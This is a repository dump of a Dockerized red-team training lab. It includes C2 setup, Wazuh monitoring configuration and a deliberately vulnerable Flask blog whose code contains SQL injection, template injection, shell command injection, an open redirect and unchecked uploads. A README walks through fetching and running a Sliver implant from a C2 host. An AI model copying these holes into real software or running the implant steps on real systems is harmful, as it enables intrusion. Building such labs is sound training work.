├── LICENSE ├── README.md ├── c2 ├── Dockerfile ├── README.md ├── init_c2_services.sh ├── init_metasploit.sh └── init_sliver.sh ├── docker-compose.yml ├── knasty ├── Dockerfile ├── README.md ├── hackme.db ├── hackme.py ├── init_knasty.sh ├── requirements.txt ├── static │ ├── .DS_Store │ ├── css │ │ ├── bootstrap.css │ │ ├── bootstrap.min.css │ │ ├── clean-blog.css │ │ ├── clean-blog.min.css │ │ └── style.css │ ├── fonts │ │ ├── glyphicons-halflings-regular.eot │ │ ├── glyphicons-halflings-regular.svg │ │ ├── glyphicons-halflings-regular.ttf │ │ ├── glyphicons-halflings-regular.woff │ │ └── glyphicons-halflings-regular.woff2 │ ├── img │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── about-bg.jpg │ │ ├── contact-bg.jpg │ │ ├── home-bg.jpg │ │ ├── khaled.jpg │ │ ├── post-bg.jpg │ │ └── post-sample-image.jpg │ ├── js │ │ ├── bootstrap.js │ │ ├── bootstrap.min.js │ │ ├── clean-blog.js │ │ ├── clean-blog.min.js │ │ ├── jquery.js │ │ └── jquery.min.js │ ├── less │ │ ├── clean-blog.less │ │ ├── mixins.less │ │ └── variables.less │ └── uploads │ │ └── 69823596_1365225413642464_3591290995368525824_n.jpg └── templates │ ├── 404.html │ ├── LICENSE │ ├── about.html │ ├── contact.html │ ├── edite.html │ ├── file_upload_form.html │ ├── img.html │ ├── index.html │ ├── layout.html │ ├── login.html │ ├── post.html │ ├── search.html │ ├── show_entries.html │ └── success.html ├── travesty ├── README.md ├── backups.sh ├── entrypoint.sh ├── get_time.pl ├── httpd.conf └── index.html └── wazuh ├── README.md └── config ├── certs.yml ├── wazuh_cluster └── wazuh_manager.conf ├── wazuh_dashboard ├── opensearch_dashboards.yml └── wazuh.yml ├── wazuh_indexer ├── internal_users.yml └── wazuh.indexer.yml └── wazuh_indexer_ssl_certs ├── admin-key.pem ├── admin.pem ├── root-ca.key ├── root-ca.pem ├── wazuh.dashboard-key.pem ├── wazuh.dashboard.pem ├── wazuh.indexer-key.pem ├── wazuh.indexer.pem ├── wazuh.manager-key.pem └── wazuh.manager.pem /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 minispooner 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red Team Playground 2 | The Red Team Playground is a Dockerized vulnerable lab network for learning and practicing Red Teaming concepts. Hack, persist, pivot, command & control, loot, monitor, evade. 3 | 4 | 5 | ## Want to Collaborate? 6 | 1. Jump in the coversations on the Issues! Don't be shy :) 7 | 2. Tip: run your ideas by the Issues threads before coding and creating PRs to avoid lost or duplicate work 8 | 9 | ## Milestones 10 | | Description | Completion | 11 | | ----------- | ---------- | 12 | | Add a few vulnerable hosts | 3/11/23 | 13 | | Add C2 - Metasploit, Sliver | 3/31/23 | 14 | | Add Wazuh monitoring | 5/4/2023 | 15 | | Automate "incident responders" | Planning | 16 | 17 | ## Features Included 18 | 1. Vulnerable targets for practicing recon, exploitation, persistence, priv esc 19 | 2. C2 infrastructure 20 | 3. Defensive monitoring (monitoring dashboard + alerts, file integrity monitoring) to practice evasion, better understand IR 21 | - TODO: include a "BlueBot" process that simulates a blue teamer w crontabs that restarts certain server processes every 5 mins (for practicing persistence), etc 22 | 3. TODO: multiple networks for practicing lateral and pivoting internally and cloud* (fontend/backend, dmz, dummy aws metadata server, etc) 23 | 4. Red Teamer game scenarios to emulate adversaries (access the customer database, hold the s3 bucket for ransom, run a miner for 10 mins without raising alerts, etc) 24 | 25 | 26 | ## Development 27 | - Projects can be tracked and worked on as Issues 28 | - Changes should be made on new branches and a PR submitted to merge into main, to be reviewed my minispooner 29 | 30 | 31 | ## Playing 32 | - Create a few game modes with various adversarial objectives 33 | - Add in a few trainings on what it means to Red Team. Could be lessons then a lab/objective, etc 34 | 35 | 36 | ## Notes clipboard 37 | ### Juice Shop 38 | http://localhost:3000/#/ 39 | 40 | ### WebGoat 41 | 1. http://localhost:8080/WebGoat/login 42 | 2. Create account (admin1:admin1) 43 | 44 | ### Travesty 45 | 1. http://localhost/ 46 | -------------------------------------------------------------------------------- /c2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM kalilinux/kali-rolling 2 | 3 | RUN apt-get update -y && apt-get upgrade -y 4 | # RUN apt update && apt -y install kali-linux-headless 5 | 6 | #### not finding a trial or free version and don't wanna use a hacked/counterfeit version 7 | # Install Cobalt Strike Team Server 8 | # RUN apt-get install openjdk-11-jdk -y 9 | # RUN update-java-alternatives -s java-1.11.0-openjdk-amd64 10 | # WORKDIR /opt 11 | # RUN mkdir /opt/cobaltstrike 12 | 13 | # Install Metasploit 14 | RUN apt-get install metasploit-framework -y 15 | 16 | # Install C2 services 17 | COPY init_* /opt/ 18 | 19 | ENTRYPOINT /opt/init_c2_services.sh -------------------------------------------------------------------------------- /c2/README.md: -------------------------------------------------------------------------------- 1 | # Command and Control (C2) 2 | 3 | ## Supported C2 4 | - [Metasploit](https://www.metasploit.com/get-started) 5 | - [Sliver](https://github.com/BishopFox/sliver/wiki/Getting-Started) 6 | 7 | ## Metasploit Tutorial 8 | - TODO 9 | 10 | ## Sliver Tutorial 11 | 1. Run `c2` and `travesty` containers 12 | ``` 13 | docker compose up -d c2 travesty --build 14 | ``` 15 | 16 | 2. Docker exec into c2 box 17 | ``` 18 | > docker ps 19 | > docker exec -it CONTAINER_ID bash 20 | ``` 21 | 22 | 3. Enter Sliver Server Shell 23 | ``` 24 | > sliver-server 25 | ``` 26 | 27 | 4. Generate implant that will call back to c2 over http/s 28 | ``` 29 | [server] sliver > generate --os linux --http c2.local --save my_implant 30 | ``` 31 | 32 | 5. Deliver implant to `travesty`\ 33 | For our tutorial, we'll just serve the implant from `c2` with 34 | ``` 35 | python3 -m http.server 36 | ``` 37 | and fetch it from `travesty` and add executable permissions using 38 | ``` 39 | wget http://c2.local:8000/my_implant && chmod +x my_implant 40 | ``` 41 | 42 | 6. Run HTTP listener on Sliver Server 43 | ``` 44 | [server] sliver > http 45 | ``` 46 | 47 | 7. Execute implant on `travesty` 48 | ``` 49 | ./my_implant 50 | ``` 51 | 52 | 8. Watch the Sliver Server prompt until you see a new session notification from the implant callback (upon execution, or in 30s or 60s retry intervals), then check the sessions list to see the active session details 53 | ``` 54 | [server] sliver > sessions 55 | ``` 56 | 57 | 9. Enter the session using the implant's name as shown from the previous `sessions` command 58 | ``` 59 | sliver > sessions --interact MISLEADING_SMOKE 60 | ``` 61 | 62 | 10. Type `help` to see available options -------------------------------------------------------------------------------- /c2/init_c2_services.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Setup all c2 services 3 | /opt/init_metasploit.sh 4 | /opt/init_sliver.sh 5 | 6 | echo "All setups complete." 7 | 8 | # Keep instance running 9 | tail -F /dev/nosuchfile -------------------------------------------------------------------------------- /c2/init_metasploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Setup Metasploit 3 | /etc/init.d/postgresql start 4 | msfdb init 5 | echo "Metasploit setup complete." -------------------------------------------------------------------------------- /c2/init_sliver.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Setup Sliver Server 3 | wget https://github.com/BishopFox/sliver/releases/download/v1.5.36/sliver-server_linux -O /opt/sliver-server_linux 4 | chmod +x /opt/sliver-server_linux 5 | mv /opt/sliver-server_linux /usr/local/bin/sliver-server 6 | # Setup Sliver Client 7 | curl https://sliver.sh/install | bash 8 | echo "Sliver setup complete." -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | # RED TEAM INFRA 4 | c2: 5 | build: c2/. 6 | hostname: c2.local 7 | ports: 8 | - '50050:50050' 9 | # networks: 10 | # dmz: 11 | # ipv4_address: 1.2.3.2 12 | # BLUE TEAM INFRA 13 | # WAZUH 14 | wazuh.manager: 15 | image: wazuh/wazuh-manager:4.4.1 16 | hostname: wazuh.manager 17 | # restart: always 18 | ports: 19 | - "1514:1514" 20 | - "1515:1515" 21 | - "514:514/udp" 22 | - "55000:55000" 23 | environment: 24 | - INDEXER_URL=https://wazuh.indexer:9200 25 | - INDEXER_USERNAME=admin 26 | - INDEXER_PASSWORD=SecretPassword 27 | - FILEBEAT_SSL_VERIFICATION_MODE=full 28 | - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem 29 | - SSL_CERTIFICATE=/etc/ssl/filebeat.pem 30 | - SSL_KEY=/etc/ssl/filebeat.key 31 | - API_USERNAME=wazuh-wui 32 | - API_PASSWORD=MyS3cr37P450r.*- 33 | volumes: 34 | - wazuh_api_configuration:/var/ossec/api/configuration 35 | - wazuh_etc:/var/ossec/etc 36 | - wazuh_logs:/var/ossec/logs 37 | - wazuh_queue:/var/ossec/queue 38 | - wazuh_var_multigroups:/var/ossec/var/multigroups 39 | - wazuh_integrations:/var/ossec/integrations 40 | - wazuh_active_response:/var/ossec/active-response/bin 41 | - wazuh_agentless:/var/ossec/agentless 42 | - wazuh_wodles:/var/ossec/wodles 43 | - filebeat_etc:/etc/filebeat 44 | - filebeat_var:/var/lib/filebeat 45 | - ./wazuh/config/wazuh_indexer_ssl_certs/root-ca.pem:/etc/ssl/root-ca.pem 46 | - ./wazuh/config/wazuh_indexer_ssl_certs/wazuh.manager.pem:/etc/ssl/filebeat.pem 47 | - ./wazuh/config/wazuh_indexer_ssl_certs/wazuh.manager-key.pem:/etc/ssl/filebeat.key 48 | - ./wazuh/config/wazuh_cluster/wazuh_manager.conf:/wazuh-config-mount/etc/ossec.conf 49 | # networks: 50 | # dmz: 51 | # ipv4_address: 1.2.3.10 52 | wazuh.indexer: 53 | image: wazuh/wazuh-indexer:4.4.1 54 | hostname: wazuh.indexer 55 | restart: always 56 | ports: 57 | - "9200:9200" 58 | environment: 59 | - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" 60 | ulimits: 61 | memlock: 62 | soft: -1 63 | hard: -1 64 | nofile: 65 | soft: 65536 66 | hard: 65536 67 | volumes: 68 | - wazuh-indexer-data:/var/lib/wazuh-indexer 69 | - ./wazuh/config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem 70 | - ./wazuh/config/wazuh_indexer_ssl_certs/wazuh.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh.indexer.key 71 | - ./wazuh/config/wazuh_indexer_ssl_certs/wazuh.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh.indexer.pem 72 | - ./wazuh/config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem 73 | - ./wazuh/config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem 74 | - ./wazuh/config/wazuh_indexer/wazuh.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml 75 | - ./wazuh/config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml 76 | # networks: 77 | # dmz: 78 | # ipv4_address: 1.2.3.11 79 | wazuh.dashboard: 80 | image: wazuh/wazuh-dashboard:4.4.1 81 | hostname: wazuh.dashboard 82 | restart: always 83 | ports: 84 | - 443:5601 85 | environment: 86 | - INDEXER_USERNAME=admin 87 | - INDEXER_PASSWORD=SecretPassword 88 | - WAZUH_API_URL=https://wazuh.manager 89 | - API_USERNAME=wazuh-wui 90 | - API_PASSWORD=MyS3cr37P450r.*- 91 | volumes: 92 | - ./wazuh/config/wazuh_indexer_ssl_certs/wazuh.dashboard.pem:/usr/share/wazuh-dashboard/certs/wazuh-dashboard.pem 93 | - ./wazuh/config/wazuh_indexer_ssl_certs/wazuh.dashboard-key.pem:/usr/share/wazuh-dashboard/certs/wazuh-dashboard-key.pem 94 | - ./wazuh/config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-dashboard/certs/root-ca.pem 95 | - ./wazuh/config/wazuh_dashboard/opensearch_dashboards.yml:/usr/share/wazuh-dashboard/config/opensearch_dashboards.yml 96 | - ./wazuh/config/wazuh_dashboard/wazuh.yml:/usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml 97 | depends_on: 98 | - wazuh.indexer 99 | links: 100 | - wazuh.indexer:wazuh.indexer 101 | - wazuh.manager:wazuh.manager 102 | # networks: 103 | # dmz: 104 | # ipv4_address: 1.2.3.12 105 | # VULNERABLE MACHINES 106 | knasty: 107 | build: knasty/. 108 | hostname: knasty.local 109 | ports: 110 | - '1017:1017' 111 | # networks: 112 | # dmz: 113 | # ipv4_address: 1.2.3.17 114 | juiceshop: 115 | image: bkimminich/juice-shop 116 | hostname: juiceshop.corp 117 | ports: 118 | - '3000:3000' 119 | networks: 120 | corp: 121 | ipv4_address: 1.1.1.16 122 | travesty: 123 | image: httpd:2.4.49 124 | hostname: travesty.local 125 | volumes: 126 | - ./travesty/httpd.conf:/usr/local/apache2/conf/httpd.conf 127 | - ./travesty/index.html:/usr/local/apache2/htdocs/index.html 128 | - ./travesty/get_time.pl:/usr/local/apache2/cgi-bin/get_time.pl 129 | - ./travesty/backups.sh:/home/backups.sh 130 | - ./travesty/entrypoint.sh:/entrypoint.sh 131 | entrypoint: /entrypoint.sh 132 | ports: 133 | - '80:80' 134 | networks: 135 | dmz: 136 | ipv4_address: 1.2.3.15 137 | corp: 138 | ipv4_address: 1.1.1.15 139 | # webgoat: 140 | # image: webgoat/goatandwolf 141 | # hostname: webgoat.local 142 | # ports: 143 | # - '8080:8080' 144 | # - '9090:9090' 145 | # metasploitable: 146 | # image: tleemcjr/metasploitable2 147 | # hostname: metasploitable.local 148 | # ports: 149 | # - '80:80' 150 | networks: 151 | dmz: 152 | ipam: 153 | config: 154 | - subnet: 1.2.3.1/24 155 | corp: 156 | internal: true 157 | ipam: 158 | config: 159 | - subnet: 1.1.1.1/24 160 | volumes: 161 | wazuh_api_configuration: 162 | wazuh_etc: 163 | wazuh_logs: 164 | wazuh_queue: 165 | wazuh_var_multigroups: 166 | wazuh_integrations: 167 | wazuh_active_response: 168 | wazuh_agentless: 169 | wazuh_wodles: 170 | filebeat_etc: 171 | filebeat_var: 172 | wazuh-indexer-data: -------------------------------------------------------------------------------- /knasty/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | 3 | WORKDIR /usr/src/app 4 | 5 | COPY requirements.txt ./ 6 | 7 | RUN pip install --no-cache-dir -r requirements.txt 8 | 9 | COPY static ./static/ 10 | COPY templates ./templates/ 11 | COPY hackme.db hackme.py ./ 12 | 13 | # Install Wazuh Agent 14 | RUN curl -so wazuh-agent.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.4.1-1_amd64.deb 15 | RUN apt-get update -y 16 | RUN apt-get install lsb-release -y 17 | RUN WAZUH_MANAGER='wazuh.manager' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='knasty' dpkg -i ./wazuh-agent.deb 18 | # Configure OSSEC (Wazuh) server address 19 | RUN sed -i "s/MANAGER_IP/wazuh.manager/g" /var/ossec/etc/ossec.conf 20 | 21 | COPY init_* /opt/ 22 | 23 | ENTRYPOINT /opt/init_knasty.sh -------------------------------------------------------------------------------- /knasty/README.md: -------------------------------------------------------------------------------- 1 | # knasty 2 | 3 | A vulnerable blog site with an admin backend. Several vulnerabilities present. 4 | 5 |
6 | Walkthrough 7 | 8 | 1. path traversal & XSS Stored : http://localhost/upload 9 | 2. SQLI : http://localhost/posts/{ID} 10 | 3. SSTI & XSS : http://localhost/search 11 | 4. CSRF : http://localhost/login/edite/42 12 | 5. SSRF & RCE : http://localhost/website?u=http://127.0.0.1 13 | 6. open redirect : http://localhost/redirect?url=http://127.0.0.1/contact 14 |
15 | 16 | UserName : admin\ 17 | Password : p@ssword 18 | 19 | Thank you https://github.com/knassar702/hacking-lab for the idea and the code! 20 | -------------------------------------------------------------------------------- /knasty/hackme.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/hackme.db -------------------------------------------------------------------------------- /knasty/hackme.py: -------------------------------------------------------------------------------- 1 | __author__ = 'Khaled Nassar' 2 | 3 | # all the imports 4 | import sqlite3,time,datetime,cgi,os,subprocess 5 | from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash, make_response 6 | from contextlib import closing 7 | from jinja2 import Environment 8 | # configuration 9 | DATABASE = 'hackme.db' 10 | DEBUG = True 11 | SECRET_KEY = 'development key' 12 | USERNAME = 'admin' 13 | PASSWORD = 'p@ssword' 14 | name = 'my blog' 15 | k='no' 16 | now = datetime.datetime.today() 17 | date = str(now.year)+'-'+str(now.month)+'-'+str(now.day) 18 | # application 19 | 20 | app = Flask(__name__) 21 | Jinja2 = Environment() 22 | app.config.from_object(__name__) 23 | def connect_db(): 24 | return sqlite3.connect(app.config['DATABASE']) 25 | 26 | 27 | def init_db(): 28 | with closing(connect_db()) as db: 29 | with app.open_resource('schema.sql', mode='r') as f: 30 | db.cursor().executescript(f.read()) 31 | db.commit() 32 | 33 | 34 | @app.before_request 35 | def before_request(): 36 | g.db = connect_db() 37 | 38 | 39 | @app.teardown_request 40 | def teardown_request(exception): 41 | db = getattr(g, 'db', None) 42 | if db is not None: 43 | db.close() 44 | 45 | @app.errorhandler(404) 46 | # inbuilt function which takes error as parameter 47 | def not_found(e): 48 | # defining function 49 | return render_template("404.html") 50 | @app.route('/') 51 | @app.route('/index') 52 | @app.route('/index.html') 53 | @app.route('/home') 54 | @app.route('/home.html') 55 | def index(): 56 | cur = g.db.execute('select id, title, description, date from entries order by id desc limit 8') 57 | a = cur.fetchall() 58 | entries = [dict(id=row[0],title=row[1], description=row[2],d=row[3]) for row in a] 59 | response=make_response(render_template('index.html',entries=entries,Name=name)) 60 | response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains' 61 | response.headers['X-Content-Type-Options'] = 'nosniff' 62 | response.headers['X-Frame-Options'] = 'SAMEORIGIN' 63 | response.headers['X-XSS-Protection'] = '1; mode=block' 64 | return response 65 | @app.route('/img/') 66 | def idimg(id): 67 | cur = g.db.execute("select id,link from img where id = %s" %id) 68 | a = cur.fetchall() 69 | entries = [dict(id=row[0],link=row[1]) for row in a] 70 | return render_template('img.html',entries=entries,Name=name) 71 | @app.route('/img') 72 | def img(): 73 | cur = g.db.execute("select id,link from img order by id desc") 74 | a = cur.fetchall() 75 | entries = [dict(id=row[0],link=row[1]) for row in a] 76 | return render_template('img.html',entries=entries,Name=name) 77 | @app.route('/website') 78 | def web(): 79 | site=request.args.get('u') 80 | return command('curl {}'.format(site)) 81 | @app.route('/redirect') 82 | def rredirect(): 83 | url=request.args.get('url') 84 | return redirect(url) 85 | @app.route('/posts') 86 | def posts(): 87 | cur = g.db.execute('select id, title, description, date from entries order by id desc') 88 | a = cur.fetchall() 89 | entries = [dict(id=row[0],title=row[1], description=row[2],d=row[3]) for row in a] 90 | return render_template('index.html',entries=entries,Name=name) 91 | @app.route('/add', methods=['POST']) 92 | def add_entry(): 93 | if not session.get('user'): 94 | abort(401) 95 | g.db.execute('insert into entries (title, description, text, date) values (?, ?, ?, ?)', 96 | [request.form['title'],request.form['description'], request.form['text'],str(date)]) 97 | g.db.commit() 98 | return redirect(url_for('index')) 99 | @app.route('/login/delete/',methods=['POST']) 100 | def delete(id): 101 | if session.get('user')=='admin': 102 | g.db.execute("DELETE from entries where id=%s"%id) 103 | g.db.commit() 104 | return redirect(url_for('index')) 105 | @app.route('/login/ok/',methods=['POST']) 106 | def ok(id): 107 | if session.get('user')=='admin': 108 | g.db.execute("UPDATE entries SET title = ?,description = ?,text=? WHERE id= ? ",[request.form['title'],request.form['description'],request.form['text'],id]) 109 | g.db.commit() 110 | return redirect(url_for('index')) 111 | else: 112 | return '' 113 | @app.route('/search',methods=['GET']) 114 | def search(): 115 | if request.method=='GET': 116 | name = request.args.get('u') 117 | output = Jinja2.from_string('Hello ' + str(name) + '!').render() 118 | return render_template('search.html',output=output) 119 | @app.route('/login/edite/') 120 | def edite(id): 121 | error= None 122 | if session.get('user')=='admin': 123 | cur = g.db.execute('select id, title, description, date, text from entries where id = {}'.format(id)) 124 | a = cur.fetchall() 125 | id=str(id) 126 | entries = [dict(id=row[0],title=row[1], description=row[2],text=row[4]) for row in a] 127 | return render_template('edite.html',Name=name,entries=entries) 128 | else: 129 | return '' 130 | @app.route('/login', methods=['GET', 'POST']) 131 | def login(): 132 | cur = g.db.execute('select id, title, description, date from entries order by id desc') 133 | a = cur.fetchall() 134 | entries = [dict(id=row[0],title=row[1], description=row[2],d=row[3]) for row in a] 135 | error = None 136 | response=make_response(render_template('login.html',error=error)) 137 | response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains' 138 | response.headers['X-Content-Type-Options'] = 'nosniff' 139 | response.headers['X-Frame-Options'] = 'SAMEORIGIN' 140 | response.headers['X-XSS-Protection'] = '1; mode=block' 141 | response.set_cookie('username', 'flask', secure=True, httponly=True) 142 | response.set_cookie('snakes', '3', max_age=600) 143 | if session.get('user') != 'admin': 144 | if request.method == 'POST': 145 | if request.form['username'] != app.config['USERNAME']: 146 | error = 'Invalid username' 147 | elif request.form['password'] != app.config['PASSWORD']: 148 | error = 'Invalid password' 149 | else: 150 | session['user'] = request.form['username'] 151 | flash('your are logged') 152 | return render_template('show_entries.html', error=error,entries=entries) 153 | elif session.get('user')=='admin': 154 | return render_template('show_entries.html', error=error,entries=entries) 155 | return response 156 | @app.route('/upload') 157 | def upload(): 158 | return render_template("file_upload_form.html") 159 | @app.route('/success',methods=['POST']) 160 | def success(): 161 | if request.method == 'POST': 162 | os.chdir('static/uploads') 163 | f = request.files['file'] 164 | f.save(f.filename) 165 | os.chdir('..') 166 | os.chdir('..') 167 | g.db.execute('insert into img (link) values (?)', 168 | [f.filename]) 169 | g.db.commit() 170 | return render_template("success.html", name = f.filename) 171 | @app.route('/about') 172 | def about(): 173 | return render_template('about.html',Name=name) 174 | @app.route('/contact') 175 | def contact(): 176 | return render_template('contact.html',Name=name) 177 | 178 | @app.route('/posts/') 179 | def singlePost(id): 180 | cur = g.db.execute("select id,title, description, text, date from entries where id = %s" %id) 181 | a = cur.fetchall() 182 | entries = [dict(id=row[0],title=row[1], description=row[2], text=row[3],d=row[4]) for row in a] 183 | id=str(id) 184 | response=make_response(render_template('post.html',entries=entries,Name=name)) 185 | response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains' 186 | response.headers['X-Content-Type-Options'] = 'nosniff' 187 | response.headers['X-Frame-Options'] = 'SAMEORIGIN' 188 | response.headers['X-XSS-Protection'] = '1; mode=block' 189 | return response 190 | 191 | @app.route('/logout') 192 | def logout(): 193 | session.pop('user', None) 194 | flash('You were logged out') 195 | return redirect(url_for('index')) 196 | def command(cmd): 197 | proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True) 198 | (out, err) = proc.communicate() 199 | return out 200 | if __name__ == '__main__': 201 | app.run(host='0.0.0.0',port=1017) #processes=2) 202 | -------------------------------------------------------------------------------- /knasty/init_knasty.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Start Wazuh Agent 3 | /var/ossec/bin/wazuh-control start 4 | 5 | python /usr/src/app/hackme.py -------------------------------------------------------------------------------- /knasty/requirements.txt: -------------------------------------------------------------------------------- 1 | Jinja2 2 | flask -------------------------------------------------------------------------------- /knasty/static/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/minispooner/red-team-playground/573e8dbea559260f8d600019f8b7a15765a68eb4/knasty/static/.DS_Store -------------------------------------------------------------------------------- /knasty/static/css/clean-blog.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Clean Blog v1.0.0 (http://startbootstrap.com) 3 | * Copyright 2014 Start Bootstrap 4 | * Licensed under Apache 2.0 (https://github.com/IronSummitMedia/startbootstrap/blob/gh-pages/LICENSE) 5 | */ 6 | 7 | body { 8 | font-family: 'Lora', 'Times New Roman', serif; 9 | font-size: 20px; 10 | color: #404040; 11 | } 12 | p { 13 | line-height: 1.5; 14 | margin: 30px 0; 15 | } 16 | p a { 17 | text-decoration: underline; 18 | } 19 | h1, 20 | h2, 21 | h3, 22 | h4, 23 | h5, 24 | h6 { 25 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 26 | font-weight: 800; 27 | } 28 | a { 29 | color: #404040; 30 | } 31 | a:hover, 32 | a:focus { 33 | color: #0085a1; 34 | } 35 | a img:hover, 36 | a img:focus { 37 | cursor: zoom-in; 38 | } 39 | blockquote { 40 | color: #808080; 41 | font-style: italic; 42 | } 43 | hr.small { 44 | max-width: 100px; 45 | margin: 15px auto; 46 | border-width: 4px; 47 | border-color: white; 48 | } 49 | .navbar-custom { 50 | position: absolute; 51 | top: 0; 52 | left: 0; 53 | width: 100%; 54 | z-index: 3; 55 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 56 | } 57 | .navbar-custom .navbar-brand { 58 | font-weight: 800; 59 | } 60 | .navbar-custom .nav li a { 61 | text-transform: uppercase; 62 | font-size: 12px; 63 | font-weight: 800; 64 | letter-spacing: 1px; 65 | } 66 | @media only screen and (min-width: 768px) { 67 | .navbar-custom { 68 | background: transparent; 69 | border-bottom: 1px solid transparent; 70 | } 71 | .navbar-custom .navbar-brand { 72 | color: white; 73 | padding: 20px; 74 | } 75 | .navbar-custom .navbar-brand:hover, 76 | .navbar-custom .navbar-brand:focus { 77 | color: rgba(255, 255, 255, 0.8); 78 | } 79 | .navbar-custom .nav li a { 80 | color: white; 81 | padding: 20px; 82 | } 83 | .navbar-custom .nav li a:hover, 84 | .navbar-custom .nav li a:focus { 85 | color: rgba(255, 255, 255, 0.8); 86 | } 87 | } 88 | @media only screen and (min-width: 1170px) { 89 | .navbar-custom { 90 | -webkit-transition: background-color 0.3s; 91 | -moz-transition: background-color 0.3s; 92 | transition: background-color 0.3s; 93 | /* Force Hardware Acceleration in WebKit */ 94 | -webkit-transform: translate3d(0, 0, 0); 95 | -moz-transform: translate3d(0, 0, 0); 96 | -ms-transform: translate3d(0, 0, 0); 97 | -o-transform: translate3d(0, 0, 0); 98 | transform: translate3d(0, 0, 0); 99 | -webkit-backface-visibility: hidden; 100 | backface-visibility: hidden; 101 | } 102 | .navbar-custom.is-fixed { 103 | /* when the user scrolls down, we hide the header right above the viewport */ 104 | position: fixed; 105 | top: -61px; 106 | background-color: rgba(255, 255, 255, 0.9); 107 | border-bottom: 1px solid #f2f2f2; 108 | -webkit-transition: -webkit-transform 0.3s; 109 | -moz-transition: -moz-transform 0.3s; 110 | transition: transform 0.3s; 111 | } 112 | .navbar-custom.is-fixed .navbar-brand { 113 | color: #404040; 114 | } 115 | .navbar-custom.is-fixed .navbar-brand:hover, 116 | .navbar-custom.is-fixed .navbar-brand:focus { 117 | color: #0085a1; 118 | } 119 | .navbar-custom.is-fixed .nav li a { 120 | color: #404040; 121 | } 122 | .navbar-custom.is-fixed .nav li a:hover, 123 | .navbar-custom.is-fixed .nav li a:focus { 124 | color: #0085a1; 125 | } 126 | .navbar-custom.is-visible { 127 | /* if the user changes the scrolling direction, we show the header */ 128 | -webkit-transform: translate3d(0, 100%, 0); 129 | -moz-transform: translate3d(0, 100%, 0); 130 | -ms-transform: translate3d(0, 100%, 0); 131 | -o-transform: translate3d(0, 100%, 0); 132 | transform: translate3d(0, 100%, 0); 133 | } 134 | } 135 | .intro-header { 136 | background-color: #808080; 137 | background: no-repeat center center; 138 | background-attachment: scroll; 139 | -webkit-background-size: cover; 140 | -moz-background-size: cover; 141 | background-size: cover; 142 | -o-background-size: cover; 143 | margin-bottom: 50px; 144 | } 145 | .intro-header .site-heading, 146 | .intro-header .post-heading, 147 | .intro-header .page-heading { 148 | padding: 100px 0 50px; 149 | color: white; 150 | } 151 | @media only screen and (min-width: 768px) { 152 | .intro-header .site-heading, 153 | .intro-header .post-heading, 154 | .intro-header .page-heading { 155 | padding: 150px 0; 156 | } 157 | } 158 | .intro-header .site-heading, 159 | .intro-header .page-heading { 160 | text-align: center; 161 | } 162 | .intro-header .site-heading h1, 163 | .intro-header .page-heading h1 { 164 | margin-top: 0; 165 | font-size: 50px; 166 | } 167 | .intro-header .site-heading .subheading, 168 | .intro-header .page-heading .subheading { 169 | font-size: 24px; 170 | line-height: 1.1; 171 | display: block; 172 | font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif; 173 | font-weight: 300; 174 | margin: 10px 0 0; 175 | } 176 | @media only screen and (min-width: 768px) { 177 | .intro-header .site-heading h1, 178 | 